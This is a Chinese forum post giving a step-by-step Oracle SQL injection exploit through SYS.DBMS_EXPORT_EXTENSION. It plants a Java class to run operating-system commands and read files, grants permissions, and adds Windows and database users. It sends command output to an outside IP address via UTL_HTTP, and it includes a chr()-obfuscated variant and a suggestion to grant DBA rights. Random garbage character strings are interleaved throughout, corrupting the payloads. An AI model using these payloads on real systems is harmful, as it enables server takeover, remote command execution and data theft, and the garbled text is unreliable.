以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 , o7 d! l k- ^/ P* ~, X0 [
" \( d0 z) g! G3 ~ /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) # W* J$ L& f* d( P7 j! N. w0 Z
的形式即可。(用" 'a'|| "是为了让语句返回true值) I6 A" |! m6 P! }7 z
语句有点长,可能要用post提交。
0 q$ d$ F( T: ~! l: W以下是各个步骤:
( W1 \% n& U( }) n: M/ r- C3 L1.创建包
' h& F) x# \3 u& Z: M$ R通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:$ M, h8 F! l. U
/xxx.jsp?id=1 and '1'<>'a'||(
F* U; l" y. Z: E/ ]select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''' z( P1 E: i5 G
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(: j8 n8 e1 g, x* W
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}9 }2 H2 e7 E; j9 f, b L: v; F
}'''';END;'';END;--','SYS',0,'1',0) from dual
% d# d- l9 W0 ]# j) 7 O' Q5 ~$ E9 v# R3 b
------------------------ , A+ s8 e" d; P$ R/ O X. ]( t6 \4 D
如果url有长度限制,可以把readFile()函数块去掉,即:
& [7 w! \2 ]& ^# n4 C/xxx.jsp?id=1 and '1'<>'a'||( $ P. x X3 T! U% m2 L
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 f) G3 H$ W5 E# l
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader( c, v( r2 r8 W; |, N( t, W
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
, K# d3 z) N8 e7 r}'''';END;'';END;--','SYS',0,'1',0) from dual 7 R1 B5 g% w1 m: j2 r
)
- @) U+ t0 \$ m k. s$ X, I同时把后面步骤 提到的 对readFile()的处理语句去掉。 6 L5 }9 v0 p# H) ?
------------------------------
1 B8 W9 m) T) h' R2.赋Java权限 7 C2 A! n( d, R- @
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual; x; V0 n+ O% _. e
3.创建函数
- {+ K1 E8 @' J) G& M1 Wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''# o; a1 F) M4 B0 h
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
* h7 W g. e6 _+ D# N: [& dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 \4 c1 a5 V3 _9 B2 {create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual5 |* X: J1 t! X7 q$ [& k) ^# U
4.赋public执行函数的权限 $ D" U* f/ X0 ~! ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual1 y& E" d$ s5 }4 u. l9 J f
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual& V" P) k$ T! |/ m
5.测试上面的几步是否成功 4 s6 a: i" \7 h8 S
and '1'<>'11'||( 1 p4 D h9 t& @6 v- x
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD' 4 X) ^, p. b T
)
* P0 w' x( X& d' y9 xand '1'<>( ( q. |8 ~0 o8 p0 {5 E, u
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
3 Q- b+ }% g* ~1 a9 y. k* K: c)
1 A: r1 R/ t9 v8 c& R1 Z" n6.执行命令:
% R$ n: _6 O2 A: W/xxx.jsp?id=1 and '1'<>( * y* R# T( T: H; d2 o; Q
select sys.LinxRunCMD('cmd /c net user linx /add') from dual ) V5 J) ^" T4 [
4 S5 f, [1 F! a! L$ J$ b7 V: Q
)
$ z) E: @- a/ l q8 B' h$ S/xxx.jsp?id=1 and '1'<>( * w+ K0 x- g2 i$ d0 g
select sys.LinxReadFile('c:/boot.ini') from dual
& U8 \* Z/ R: Y2 i6 ^ `- }2 M
% x5 I0 [/ s T- o z* h5 J. b7 x$ ~9 C)/ @" @4 W( Q6 ~. e$ w4 }+ ^
. |3 H h8 `6 F注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 9 J$ p7 t# ], n) a
如果要查看运行结果可以用 union :
9 E- v0 a$ T2 X/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
$ ?% f, i3 {$ D& \( l' a% I或者UTL_HTTP.request(:
! O9 ~6 n; C, ^# @% {/xxx.jsp?id=1 and '1'<>( ]* L' `1 _8 s4 I
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual' H4 U8 w+ Q0 J5 `7 ^; X5 e; z
)
' p7 \ o$ g6 b: `: D1 B1 S8 S/xxx.jsp?id=1 and '1'<>(
3 Y( v6 w/ B6 M. W, Y) X! x- X: ?SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
% L) ], ?( i/ m) f7 P/ `% l: \9 N/ L
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
; g# K6 V+ G9 D3 c" j8 x--------------------
2 A6 R( l, s: A+ n* n8 c6.内部变化 ( M$ q* T# J% j3 _. a7 X
通过以下命令可以查看all_objects表达改变:
1 x% Q+ H$ a, T# Mselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'" \! B# s+ T. v+ ?, Q! f. I3 m
7.删除我们创建的函数 7 e x' K* `; M& W5 `( w/ R0 ]8 X: Y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''# X$ B4 d; `4 v3 F, t
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
- F9 I8 X7 B, [- S==================================================== * Y. j5 b5 a3 r9 S! K
全文结束。谨以此文赠与我的朋友。
/ P' L. `9 ?! Y6 S8 }0 Z4 ylinx
# H* G e# a6 r; _124829445 9 d" q5 J6 @* Z6 E& j0 v" ~
2008.1.12 & o6 }. e0 V4 _8 C
linyujian@bjfu.edu.cn
, V" G$ A6 Y: h# S( _/ L% v======================================================================
( I" U2 Q% K9 y" ~ [$ g( ^" l2 o+ h测试漏洞的另一方法:
. B8 x) p5 B* {# {* m创建oracle帐号: ; F: u% I P1 n6 _ j" v# _ l$ N3 L
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" {6 h8 j- S! |CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual# G( p/ _1 c0 R; k) n
即: 3 ~' L0 ?1 S8 ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),& n R' ]4 y3 {9 m+ V
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
+ c8 M% N) l2 A) n' e确定漏洞存在:
t! {7 ?% z9 E4 c4 U1<>( / Z# [# ^+ m! a0 _% F) g! ^
select user_id from all_users where username='LINXSQL'
0 r: |8 T. l- _$ C/ ?' q) * _# e( y3 Z+ E4 I: ?
给linxsql连接权限: ; c O5 p3 r5 ]- q! [% }
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
( m, ?5 e. }* c4 cGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
! |, P+ Q8 @2 L删除帐号:
3 F1 s3 M; N+ d* n$ d% T2 ^select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 Q }4 a9 P5 `! ~( z
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
( f9 u; d3 X" d3 \& ~8 t====================== 9 c4 e4 E' @1 D1 I) `; V+ ]
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:2 d9 g6 A c. y. l; J1 F0 U
1.jsp?id=1 and '1'<>(
. G2 m; S6 _9 Nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; G4 b; ]" Y, q
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
7 \/ ]3 q, H- ~) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
* P- j- O$ i) U! H8 S! V. c' M )+ f8 P/ J* Y6 ^* o
5 V8 q- u4 s# _4 w5 h( W4 H
; ~: ?+ w9 R8 ^) a1 K( `
' z9 j* \3 x$ i& n3 b |
发表于 2012-12-18 12:21:48
收藏
支持
反对